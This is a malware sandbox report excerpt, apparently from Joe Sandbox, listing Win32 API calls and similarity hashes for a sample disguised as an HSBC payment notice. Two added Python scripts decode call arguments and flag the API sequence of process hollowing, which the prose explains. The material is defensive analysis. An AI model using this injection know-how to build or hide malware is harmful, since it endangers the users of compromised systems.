                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                                                                                                                                                    • Instruction ID: 3e9ad2372c7cfb2b297ed5c82f770502f6fc7a31e1f40b0728b8e52e39df89fe
                                                                                                                                                    • Opcode Fuzzy Hash: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                                                                                                                                                    • Instruction Fuzzy Hash: 9A018870144708BEF7201E24CC8AF673ADCEB05768F10832AFAD56A1D0C6B81C458F58
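The API listings above print Win32 arguments as raw hex, so the two CreateFileW calls (ref 00405CC7 and 0043DD73) and the SystemParametersInfoW pair in the preceding function (refs 00404915 and 00404874) are easier to read once the constants are decoded. The following is an added example, not Joe Sandbox code: it parses lines in the report's own `Api.MODULE(args), ref: ADDR` form and maps the numeric arguments to their documented SDK names (GENERIC_READ, OPEN_EXISTING, SPI_SETFOREGROUNDLOCKTIMEOUT and so on). The sample input is copied from the listings on this page; everything else (function and constant table names) is this example's own choice. Two caveats for reading the result: the `?` path argument means the file name is not recoverable from the static listing, so the actual target comes from the dynamic file-activity sections of the report, not from here; and all four calls live in the 00400000 image (the AutoIt stub the report flags), not in the unpacked region at 02F10000.

```python
"""Decode raw Win32 arguments from Joe Sandbox per-function API listings (added example)."""
import re
from typing import Any, Dict, List, Optional

# Sample input: API lines copied verbatim from the function listings in this report section.
REPORT_LINES = [
    "• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7",
    "• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73",
    "• Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915",
    "• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874",
]

# Report line shape: Api.MODULE(arg,arg,...), ref: ADDRESS   ("?" marks an unresolved argument)
CALL_RE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Documented Win32 SDK constants (winnt.h / fileapi.h / winuser.h).
GENERIC_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                  (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE_MODE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = [(0x80, "FILE_ATTRIBUTE_NORMAL"), (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"),
              (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"), (0x40000000, "FILE_FLAG_OVERLAPPED")]
SPI_ACTIONS = {0x2000: "SPI_GETFOREGROUNDLOCKTIMEOUT", 0x2001: "SPI_SETFOREGROUNDLOCKTIMEOUT"}
SPIF_FLAGS = [(0x1, "SPIF_UPDATEINIFILE"), (0x2, "SPIF_SENDCHANGE")]


def _arg(token: str) -> Any:
    token = token.strip()
    if token == "?":
        return None                 # not recoverable statically
    try:
        return int(token, 16)       # the report prints integers as 8-digit hex
    except ValueError:
        return token                # a string literal the tool resolved, e.g. "%I"


def parse_call(line: str) -> Optional[Dict[str, Any]]:
    """Split one report line into api / module / args / ref; None if it is not a call line."""
    m = CALL_RE.search(line)
    if not m:
        return None
    return {
        "api": m["api"], "module": m["module"], "ref": m["ref"].upper(),
        "args": [_arg(a) for a in m["args"].split(",") if a.strip()],
        "subcall": "Part of subcall function" in line,
    }


def flag_names(value: Optional[int], table) -> str:
    """Render a bit-flag value as OR-ed constant names, keeping any unknown bits as hex."""
    if value is None:
        return "?"
    names, rest = [], value
    for bit, name in table:
        if rest & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def describe(call: Dict[str, Any]) -> Dict[str, Any]:
    """Decode the arguments of the APIs this example knows; pass others through untouched."""
    a = call["args"]
    out = {"api": call["api"], "ref": call["ref"]}
    if call["api"] == "CreateFileW" and len(a) >= 7:       # first 7 args are the real parameters
        out.update({
            "path": "?" if a[0] is None else a[0],
            "desired_access": flag_names(a[1], GENERIC_ACCESS),
            "share_mode": flag_names(a[2], SHARE_MODE),
            "creation_disposition": DISPOSITION.get(a[4], "?" if a[4] is None else hex(a[4])),
            "flags_and_attributes": flag_names(a[5], FILE_FLAGS),
        })
    elif call["api"] == "SystemParametersInfoW" and len(a) >= 4:
        out.update({
            "action": SPI_ACTIONS.get(a[0], "?" if a[0] is None else hex(a[0])),
            "ui_param": a[1],
            "pv_param": "?" if a[2] is None else a[2],
            "win_ini": flag_names(a[3], SPIF_FLAGS),
        })
    else:
        out["args"] = a
    return out


def decode_listing(lines: List[str]) -> List[Dict[str, Any]]:
    return [describe(c) for c in map(parse_call, lines) if c]


if __name__ == "__main__":
    for entry in decode_listing(REPORT_LINES):
        print(entry)
```

Run as-is, the script shows the first CreateFileW as a read-only OPEN_EXISTING open and the second as a read/write OPEN_ALWAYS open (both with full sharing and FILE_ATTRIBUTE_NORMAL), and the SystemParametersInfoW pair as a get of the foreground lock timeout followed by setting it to 0 with SPIF_SENDCHANGE, which is the startup sequence the AutoIt interpreter performs so its windows can take the foreground. Lines without a parenthesised argument list, such as `WriteFile.KERNEL32 ref: 02F1B109` in the 02F10000 region, are skipped rather than misparsed.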
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                      • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                      • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                      • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3902256705-0
                                                                                                                                                    • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                                                                                    • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                                                                                                                    • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                                                                                    • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock_file_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 26237723-0
                                                                                                                                                    • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                                                                                                                    • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                                                                                                                                                    • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                                                                                                                    • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNEL32(?,?,0000004C,?,00000000), ref: 02F1ACDE
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 02F1AD99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 539440098-0
                                                                                                                                                    • Opcode ID: 8a7cb6ffca69da678ae10aeeb9afad1281f02b6a647afe6803645b3319d40025
                                                                                                                                                    • Instruction ID: 2c085cf11f39b8a175335fe2b0bffc1c39f59f4ee5090b3bfce1dbdd92992c2c
                                                                                                                                                    • Opcode Fuzzy Hash: 8a7cb6ffca69da678ae10aeeb9afad1281f02b6a647afe6803645b3319d40025
                                                                                                                                                    • Instruction Fuzzy Hash: 4BF02435F4B780EFE72D46118C29E71BF61AF822E0FC84881E3478A190DB60C800C355
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2ff630e43cdaf5c56dc6cd37287166a9a1d590c2ed8f2b2803ff94b0dcf5a054
                                                                                                                                                    • Instruction ID: 0b7c17b7efec615607de4f89bf5469517a150ed59c0accfb62649e206e1f4fbc
                                                                                                                                                    • Opcode Fuzzy Hash: 2ff630e43cdaf5c56dc6cd37287166a9a1d590c2ed8f2b2803ff94b0dcf5a054
                                                                                                                                                    • Instruction Fuzzy Hash: 68F08221E80BD596FE3F0A69AB087352AC46B627F8FD84B1CDB60A31F0D3419810654D
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                    • __lock_file.LIBCMT ref: 004253EB
                                                                                                                                                      • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                                                                                                                    • __fclose_nolock.LIBCMT ref: 004253F6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2800547568-0
                                                                                                                                                    • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                                                                                    • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                                                                                                                    • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                                                                                    • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E

APIs
• SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 02F1AD99
• WriteFile.KERNEL32 ref: 02F1B109
Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: File$PointerWrite
• String ID:
• API String ID: 539440098-0
• Opcode ID: dafe0fb7b9a8c480bc1998f1476e414acf271f57d9c4a363682121195c796556
• Instruction ID: 56570733198f227465f70034bada655b210bb1bfe142c8c0fa613399060ae67d
• Opcode Fuzzy Hash: dafe0fb7b9a8c480bc1998f1476e414acf271f57d9c4a363682121195c796556
• Instruction Fuzzy Hash: 62E01275E49300EBEA258605C859D3AB769B7C56E9FC14A4DB32749680D7B590008A51

APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD
  • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ByteCharMultiWide$_memmove
• String ID:
• API String ID: 3033907384-0
• Opcode ID: c81d0131ee7ad705754dbe13e631e1a2bdd3df71c0580d00e1d0387577788cfc
• Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
• Opcode Fuzzy Hash: c81d0131ee7ad705754dbe13e631e1a2bdd3df71c0580d00e1d0387577788cfc
• Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679

APIs
• CreateProcessW.KERNEL32(?,00000000), ref: 00AC0DB5
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00AC0DD9
• ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00AC0DFB
Memory Dump Source
• Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_abf000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
• Instruction ID: 1abb0390d8b55cf11d8b05e2be2f1c1d67791c1483496d943392739144675c26
• Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
• Instruction Fuzzy Hash: 7012CC24E24658C6EB24DF64D8507DEB232EF68300F1091ED910DEB7A5E77A4E81CF5A
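The entry above is the one worth pausing on when triaging this listing: a single function in a dump the report marks "based on PE: false" (code running from a memory region rather than a mapped image) calls CreateProcessW, Wow64GetThreadContext with 00010007 (CONTEXT_FULL for a 32-bit context) and a 4-byte ReadProcessMemory on the new process, which is the usual shape of process hollowing and is consistent with the "Maps a DLL or memory area into another process" signature. The following Python is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling: it parses the per-function "APIs" / "Memory Dump Source" entries in the format printed on this page and flags functions that combine two or more injection-related API roles. The entry delimiter (the "Instruction Fuzzy Hash" line), the API family table and the two-family threshold are this example's own assumptions; the sample listing is copied from three entries on this page, trimmed to the fields the parser uses.

```python
"""Added triage example: parse a Joe Sandbox per-function API listing and flag functions
whose API mix matches remote-process manipulation (not part of the report or Joe Sandbox)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Matches "• CreateProcessW.KERNEL32(?,00000000), ref: 00AC0DB5" and the nested
# "• Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789" form.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# Matches "• Source File: <dump>.sdmp, Offset: 02F10000, based on PE: false".
SRC_RE = re.compile(r"Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(?P<pe>true|false)")
# Documented Win32/NT exports grouped by role (table is this example's assumption).
# Two or more roles inside one function is the shape of process hollowing / injection.
INJECTION_FAMILIES: Dict[str, Set[str]] = {
    "process_create": {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    "thread_context": {"GetThreadContext", "SetThreadContext",
                       "Wow64GetThreadContext", "Wow64SetThreadContext"},
    "remote_memory": {"ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx",
                      "VirtualProtectEx", "NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "resume": {"ResumeThread", "NtResumeThread"},
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                          # call-site address from "ref:"
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines

@dataclass
class Entry:
    calls: List[ApiCall] = field(default_factory=list)
    offset: Optional[int] = None
    backed_by_pe: Optional[bool] = None  # False: dump region is not a mapped PE image

def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_RE.match(line.strip())
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") is not None else []
    sub = int(m.group("sub"), 16) if m.group("sub") else None
    return ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub)

def parse_listing(text: str) -> List[Entry]:
    entries, cur = [], Entry()   # one Entry per function; ends at its Instruction Fuzzy Hash
    for raw in text.splitlines():
        line = raw.strip()
        call, src = parse_api_line(line), SRC_RE.search(line)
        if call:
            cur.calls.append(call)
        elif src:
            cur.offset = int(src.group("off"), 16)
            cur.backed_by_pe = src.group("pe") == "true"
        elif line.startswith("• Instruction Fuzzy Hash:"):
            entries.append(cur)
            cur = Entry()
    return entries

def injection_families(entry: Entry) -> Dict[str, Set[str]]:
    hit: Dict[str, Set[str]] = {}
    for c in entry.calls:
        for fam, names in INJECTION_FAMILIES.items():
            if c.api in names:
                hit.setdefault(fam, set()).add(c.api)
    return hit

def triage(entries: List[Entry], min_families: int = 2) -> List[dict]:
    """Functions worth a closer look, most API roles first; 'unbacked' = not in a PE image."""
    out = []
    for e in entries:
        fams = injection_families(e)
        if len(fams) >= min_families:
            out.append({"offset": e.offset, "families": sorted(fams), "unbacked": e.backed_by_pe is False,
                        "apis": sorted(a for names in fams.values() for a in names)})
    return sorted(out, key=lambda r: -len(r["families"]))

# Sample input copied from three entries of this report's listing, trimmed to the fields used.
SAMPLE_LISTING = """
APIs
• SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 02F1AD99
• WriteFile.KERNEL32 ref: 02F1B109
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
• Instruction Fuzzy Hash: 62E01275E49300EBEA258605C859D3AB769B7C56E9FC14A4DB32749680D7B590008A51
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
  • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679
APIs
• CreateProcessW.KERNEL32(?,00000000), ref: 00AC0DB5
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00AC0DD9
• ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00AC0DFB
• Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
• Instruction Fuzzy Hash: 7012CC24E24658C6EB24DF64D8507DEB232EF68300F1091ED910DEB7A5E77A4E81CF5A
"""

if __name__ == "__main__":
    for finding in triage(parse_listing(SAMPLE_LISTING)):
        print(finding)
```

Run against the sample, only the 0x00ABF000 function is reported, with three roles (process_create, thread_context, remote_memory) and unbacked set; the file-pointer and string-conversion functions score zero. Raising min_families to 4 would also demand a ResumeThread in the same function, which this listing does not show, so the threshold is a tuning knob rather than a verdict.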

APIs
Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 2360f87b1ef59b3aa0b453d18c10f7173363f48802594d37deeb67b3fae5a281
• Instruction ID: 601f9b4c13dffd19c83dd984056262cdd0ab5ca04344637fbae75c7248afed11
• Opcode Fuzzy Hash: 2360f87b1ef59b3aa0b453d18c10f7173363f48802594d37deeb67b3fae5a281
• Instruction Fuzzy Hash: 2A81BA25D0D3C09EEB2687248A757367FE15F526E8FCC458ED3D6871E2C3A59408C792

Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8c88c0247d0b9b6ca8d51729b0c1c1a2294919098552b49130528ba5c7d99ad
• Instruction ID: 44d49e51eb9cd6778ae44b1ba10acef5439c64be1ba8b2bbb65ad2d3610aee49
• Opcode Fuzzy Hash: c8c88c0247d0b9b6ca8d51729b0c1c1a2294919098552b49130528ba5c7d99ad
• Instruction Fuzzy Hash: 5D512775E0D3809AEB39CB288964736BBE05F526E8FCC055ED7C687291C3B69504C793

Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9a4eac9cae6ae412a9e9d844f6cabf31f1ec9c88f92de94d838ac32c95e10256
• Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
• Opcode Fuzzy Hash: 9a4eac9cae6ae412a9e9d844f6cabf31f1ec9c88f92de94d838ac32c95e10256
• Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49

APIs
• SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
• Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
• Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
